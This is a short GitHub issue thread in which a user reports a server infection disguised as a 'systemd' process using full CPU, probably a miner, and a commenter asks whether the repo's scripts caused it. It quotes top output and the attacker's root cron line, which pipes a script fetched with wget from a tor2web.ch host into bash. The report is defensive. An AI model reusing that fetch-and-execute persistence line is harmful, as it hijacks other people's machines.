suspicious website tor2web.ch? #352

Open
Folyd opened this issue Jun 28, 2018 · 1 comment


Folyd commented Jun 28, 2018

Hi, I found a suspicious website tor2web.ch which was disguised as a fake systemd process running at 100% CPU. I don't know what the fake process actually does, probably mining.

Here is the top result:

top - 16:11:33 up 349 days,  9:30,  3 users,  load average: 1.12, 1.12, 1.13
Tasks: 128 total,   2 running, 126 sleeping,   0 stopped,   0 zombie
%Cpu(s):100.0 us,  0.0 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   2049904 total,  1221080 used,   828824 free,   114388 buffers
KiB Swap:        0 total,        0 used,        0 free.   152204 cached Mem

  PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND
12379 root      20   0   46132    200      0 S 98.2  0.0 113787:55 systemd
 8198 root      20   0   22348   1844    736 S  0.3  0.1   1193:06 nload
22853 root      20   0   22224   1784    664 S  0.3  0.1 462:12.66 nload
23606 ubuntu    20   0   30348   7208    668 S  0.3  0.4 246:54.79 tmux
25350 root      20   0   24924   1640   1172 R  0.3  0.1   0:00.09 top
25404 root      20   0  102356   3816   2764 S  0.3  0.2   0:00.01 sshd
27601 root      20   0   47212  23992    668 S  0.3  1.2 241:26.20 tmux

Here is the cron task which runs wget to obtain the shell script and then runs it in the background. However, the link is not available anymore.

MAILTO=""
5 * * * * root wget -qO- -U- httpsxztdjm2vrpw.tor2web.ch/systemd|bash
@alectrocute

WTF.

Yup, this is probably mining. Did you receive this process on your machine as a result of installing the scripts in this repo?

If so, this needs to be reported and rectified. I know it’s been over a year, but let me know.
